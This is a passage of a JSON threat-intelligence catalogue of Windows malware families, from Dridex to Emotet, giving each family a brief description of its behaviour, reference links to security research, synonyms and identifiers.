"OxCERT blog describes Dridex as \"an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term.\"\r\nAccording to MalwareBytes, \"Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method.\"\r\nIBM X-Force discovered \"a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems.\"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dridex", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://aaqeel01.wordpress.com/2021/02/07/dridex-malware-analysis/", "https://adalogics.com/blog/the-state-of-advanced-code-injections", "https://gaissecurity.com/uploads/csirt/EN-Dridex-banking-trojan.pdf", "https://securityintelligence.com/dridexs-cold-war-enter-atombombing/", "https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction", "https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt", "https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf", "https://www.cert.pl/en/news/single/talking-dridex-part-0-inside-the-dropper/", "https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process", "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", "https://en.wikipedia.org/wiki/Maksim_Yakubets", "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.secureworks.com/research/threat-profiles/gold-drake", "https://www.flashpoint-intel.com/blog-dridex-banking-trojan-returns/", "https://thedfirreport.com/2020/08/03/dridex-from-word-to-domain-dominance/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://unit42.paloaltonetworks.com/wireshark-tutorial-decrypting-https-traffic/", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://twitter.com/TheDFIRReport/status/1356729371931860992", "https://www.pandasecurity.com/mediacenter/src/uploads/2017/10/Informe_Dridex_Revisado_FINAL_EN-2.pdf", "https://www.secureworks.com/research/threat-profiles/gold-heron", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/dridex-financial-trojan.pdf", "https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/", "https://www.cert.ssi.gouv.fr/ioc/CERTFR-2020-IOC-003/", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-005.pdf", "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://threatresearch.ext.hp.com/dridex-malicious-document-analysis-automating-the-extraction-of-payload-urls/", "https://isc.sans.edu/forums/diary/Recent+Dridex+activity/26550/", "https://www.govcert.admin.ch/blog/28/the-rise-of-dridex-and-the-role-of-esps", "https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/", "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://viql.github.io/dridex/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://reaqta.com/2020/06/dridex-the-secret-in-a-postmessage/", "https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation", "https://votiro.com/blog/anatomy-of-a-well-crafted-ups-fedex-and-dhl-phishing-email-during-covid-19/" ], "synonyms": [], "type": [] }, "uuid": "b4216929-1626-4444-bdd7-bfd4b68a766e", "value": "Dridex" }, { "description": "Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin", "https://www.secureworks.com/research/threat-profiles/gold-niagara", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html", "https://www.welivesecurity.com/2015/09/08/carbanak-gang-is-back-and-packing-new-guns/" ], "synonyms": [ "Spy.Agent.ORM", "Toshliph" ], "type": [] }, "uuid": "76f6f047-1362-4651-bd2f-9ca10c119e8d", "value": "DRIFTPIN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion", "https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan" ], "synonyms": [ "Masson" ], "type": [] }, "uuid": "a752676f-06c1-426c-9fcb-6c199afc74af", "value": "Dripion" }, { "description": "Communicates via Google Drive.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean", "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html" ], "synonyms": [ "Google Drive RAT" ], "type": [] }, "uuid": "730a4e94-4f9b-4f34-a1f3-1c97d341332c", "value": "DriveOcean" }, { "description": "DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropbook", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign" ], "synonyms": [], "type": [] }, "uuid": "8c142a72-0efb-4850-b684-bc6b5300f85e", "value": "DropBook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-2/", "https://www.megabeets.net/decrypting-dropshot-with-radare2-and-cutter-part-1/" ], "synonyms": [], "type": [] }, "uuid": "cfdb02f2-a767-4abb-b04c-333a02cdd7e2", "value": "DROPSHOT" }, { "description": "Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. \r\nIts core functionality includes operations to upload a file to the victim's computer, download a file from the victim's computer, dump disk volume data, persistence and more.\r\n\r\nA variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dtrack", "https://www.cyberbit.com/blog/endpoint-security/dtrack-apt-malware-found-in-nuclear-power-plant/", "https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/", "https://marcoramilli.com/2019/11/04/is-lazarus-apt38-targeting-critical-infrastructures/", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://securelist.com/my-name-is-dtrack/93338/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://blog.macnica.net/blog/2020/11/dtrack.html", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [], "type": [] }, "uuid": "414f95e1-aabe-4aa9-b9be-53e0826f62c1", "value": "Dtrack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy", "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "440daef1-385d-42fd-a714-462590d4ce6b", "value": "DualToy (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel", "https://securelist.com/blog/research/71713/darkhotels-attacks-in-2015/", "https://www.reuters.com/article/us-health-coronavirus-who-hack-exclusive/exclusive-elite-hackers-target-who-as-coronavirus-cyberattacks-spike-idUSKBN21A3BN", "http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html", "https://blogs.technet.microsoft.com/mmpc/2016/06/09/reverse-engineering-dubnium-2/3/" ], "synonyms": [], "type": [] }, "uuid": "309d0745-bbfd-43bc-b2c4-511592a475bf", "value": "DarkHotel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute", "https://github.com/ch0sys/DUBrute" ], "synonyms": [], "type": [] }, "uuid": "2236a08f-dfbd-4f92-9d73-a895c34766ad", "value": "DUBrute" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador" ], "synonyms": [], "type": [] }, "uuid": "ea59906d-b5e1-4749-8494-9ad9a09510b5", "value": "Dumador" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://securelist.com/blog/research/70504/the-mystery-of-duqu-2-0-a-sophisticated-cyberespionage-actor-returns/", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet_research.pdf" ], "synonyms": [], "type": [] }, "uuid": "7344cee0-87c9-46a1-85aa-0d3c8c9c8cc6", "value": "DuQu" }, { "description": "In 2019, multiple destructive attacks were observed targeting entities within the Middle East. The National Cyber Security Centre (NCSC), a part of the National Cybersecurity Authority (NCA), detected a new malware named \"DUSTMAN\" that was detonated on December 29, 2019. Based on analyzed evidence and artifacts found on machines in a victim’s network that were not wiped by the malware. NCSC assess that the threat actor behind the attack had some kind of urgency on executing the files on the date of the attack due to multiple OPSEC failures observed on the infected network. NCSC is calling the malware used in this attack \"DUSTMAN\" after the filename and string embedded in the malware. \"DUSTMAN\" can be considered as a new variant of \"ZeroCleare\" malware,\r\npublished in December 2019.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dustman", "https://twitter.com/Irfan_Asrar/status/1213544175355908096", "https://www.linkedin.com/posts/iasrar_dustman-report-in-english-activity-6619216346083393537-NV1z/", "https://www.scribd.com/document/442225568/Saudi-Arabia-CNA-report", "https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" ], "synonyms": [], "type": [] }, "uuid": "daa3d1e4-9265-4f1c-b1bd-9242ac570681", "value": "DUSTMAN" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy" ], "synonyms": [ "Escad" ], "type": [] }, "uuid": "a5eb921e-17db-46de-a907-09f9ad05a7d7", "value": "Duuzer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack", "https://content.fireeye.com/apt/rpt-apt38", "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://github.com/649/APT38-DYEPACK" ], "synonyms": [ "swift" ], "type": [] }, "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", "value": "DYEPACK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre", "https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/", "https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf", "https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/", "https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates", "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/", "https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/" ], "synonyms": [ "Dyreza" ], "type": [] }, "uuid": "1ecbcd20-f238-47ef-874b-08ef93266395", "value": "Dyre" }, { "description": "FireEye describes EASYNIGHT is a loader observed used with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.\r\n\r\nExamples include a patched bcrypt.dll with no other modification than an additional import entry, in the observed case \"printwin.dll!gzwrite64\" (breaking the file signature).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.easynight", "https://content.fireeye.com/api/pdfproxy?id=86840", "https://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/" ], "synonyms": [], "type": [] }, "uuid": "0277b1e5-ea2d-4dec-bbaa-13e25a2d1f1c", "value": "EASYNIGHT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom", "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", "https://twitter.com/JaromirHorejsi/status/815861135882780673" ], "synonyms": [], "type": [] }, "uuid": "24fe5fef-6325-4c21-9c35-a0ecd185e254", "value": "EDA2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor", "https://www.intrinsec.com/egregor-prolock/", "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/", "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", "https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/", "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", "https://twitter.com/redcanary/status/1334224861628039169", "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", "https://www.group-ib.com/blog/egregor", "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", "https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/", "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", "https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/" ], "synonyms": [], "type": [] }, "uuid": "cd84bc53-8684-4921-89c7-2cf49512bf61", "value": "Egregor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel", "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "257da597-7e6d-4405-9b10-b4206bb013ca", "value": "EHDevel" }, { "description": "The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.us-cert.gov/ncas/analysis-reports/AR19-129A", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" ], "synonyms": [], "type": [] }, "uuid": "0f5a2ce1-b44f-4088-a4c0-04456a90c174", "value": "ELECTRICFISH" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder", "https://www.clearskysec.com/iec/" ], "synonyms": [], "type": [] }, "uuid": "31b18d64-815c-4464-8fcc-f084953a75f5", "value": "ElectricPowder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" ], "synonyms": [], "type": [] }, "uuid": "eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9", "value": "Elirks" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", "https://www.joesecurity.org/blog/8409877569366580427", "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html", "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", "https://www.secureworks.com/research/threat-profiles/bronze-elgin", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf" ], "synonyms": [ "EVILNEST" ], "type": [] }, "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, { "description": "ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", "https://attack.mitre.org/software/S0064", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" ], "synonyms": [ "Elmost" ], "type": [] }, "uuid": "e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834", "value": "ELMER" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", "https://www.macnica.net/file/security_report_20160613.pdf", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "6bf7aa6a-3003-4222-805e-776cb86dc78a", "value": "Emdivi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emissary", "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/" ], "synonyms": [], "type": [] }, "uuid": "a171f40a-85eb-4b64-af1d-8860a49b3b40", "value": "Emissary" }, { "description": "While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.\r\nIt is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.youtube.com/watch?v=q8of74upT_g", "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/", "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure", "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", "https://www.jpcert.or.jp/english/at/2019/at190044.html", "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", "https://twitter.com/raashidbhatt/status/1237853549200936960", "https://www.us-cert.gov/ncas/alerts/TA18-201A", "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf", "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", "https://www.secureworks.com/research/threat-profiles/gold-crestwood", "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", "https://www.youtube.com/watch?v=5_-oR_135ss", "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", "https://www.youtube.com/watch?v=_BLOmClsSpc", "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", "https://paste.cryptolaemus.com", "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code", "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", "https://www.gdata.de/blog/2017/10/30110-emotet-beutet-outlook-aus", "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/", "https://medium.com/@0xd0cf11e/analyzing-emotet-with-ghidra-part-1-4da71a5c8d69", "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled", "https://blog.talosintelligence.com/2020/11/emotet-2020.html", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", "https://www.zdnet.com/article/meet-the-white-hat-group-fighting-emotet-the-worlds-most-dangerous-malware/", "https://www.hornetsecurity.com/en/security-information/awaiting-the-inevitable-return-of-emotet/", "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", 